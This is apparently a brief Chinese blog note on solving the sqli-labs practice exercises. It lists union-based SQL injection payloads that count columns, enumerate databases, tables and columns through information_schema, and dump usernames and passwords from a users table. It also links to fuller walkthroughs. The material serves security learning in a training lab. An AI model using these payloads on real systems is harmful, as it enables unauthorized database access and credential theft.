第一题
order by 3 // 查询列数 union select 1,2,3 // 查看显示位置 '--+ // 判断为单引号字符型注入, --+即注释 // 查询数据库名称 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ // 查询数据表名 (select group_concat(table_name) from information_schema.tables where table_schema='security') // 查询表中列的名称 select group_concat(column_name) from information_schema.columns where table_name='users' // 查询用户名和密码 select group_concat(username) from security.users select group_concat(password) from security.users
其中 group_concat() 函数可以将查询结果按一串字符表示。
差不多刷完了。刷得快吐了
懒得写
https://blog.zeddyu.info/2019/03/03/Sqli-lab速刷记录(1-53)
http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/
第一个链接整理得蛮好的,不过只刷了53题;第二个链接有后面几道题的答案
OK,54题我得到了secret key, 却没办法提交。
后面继续看《白帽子讲web安全》
2020年5月1日
忘完了,真的是….尴尬
暂无评论